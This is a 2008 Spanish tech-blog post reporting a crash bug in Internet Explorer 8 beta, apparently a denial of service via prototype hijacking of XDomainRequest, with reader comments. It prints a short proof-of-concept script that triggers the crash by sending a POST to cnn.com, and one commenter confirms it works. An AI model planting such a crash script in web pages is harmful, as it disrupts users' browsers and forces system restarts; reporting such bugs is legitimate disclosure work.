Cuelga Internet Explorer 8 con un simple script
Martes 1 de Abril, 2008 por Antonio Online
Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una característica nueva que permiten las llamadas XML entre dominios. Este ataque es similar al de XMLHttpRequest, del año 2006.
Internet Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, provocando así un ataque infinito, teniendo como única solución: reiniciar el sistema.
El ataque puede realizarse con el siguiente código:
<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
- ↑ Siguiente: Demanda: ¿Apple nos estafa con sus pantallas?
- ↓ Anterior: Kroll Ontrack: Recuperación de datos autorizado por Apple
6 comentarios sobre “Cuelga Internet Explorer 8 con un simple script”
Comenta este artículo
Nota: Los comentarios escritos en mayúsculas o tipo SMS serán eliminados, al igual que los comentarios ofensivos o sin educación contra los lectores y/o editores de este medio.
Abril 1, 2008 (3:58 pm)
Comprobado, funciona. Algunos están todavía en Explorer 6 y ustedes ya conocen errores del 8, buen ritmo, saludos!
Abril 2, 2008 (1:48 am)
[...] Vía: | XKOD [...]
Abril 2, 2008 (1:49 am)
Increíble, muy bueno.
Un saludo Anthony :P
Abril 2, 2008 (11:23 am)
@Manuel, lee aquí:
http://www.0×000000.com/?i=543
Te enterarás con más detalle, esa es mi fuente.
Abril 4, 2008 (9:53 am)
Menos mal que aún esta en Beta, sino, me preocuparía… :D
A ver, lanzamos una bombita de Firefox en Beta!??? :D
Saludos.
Febrero 2, 2009 (1:00 pm)
[...] tecnología es vulnerable, sea la que sea, esto le acaba de ocurrir a las tarjetas con [...]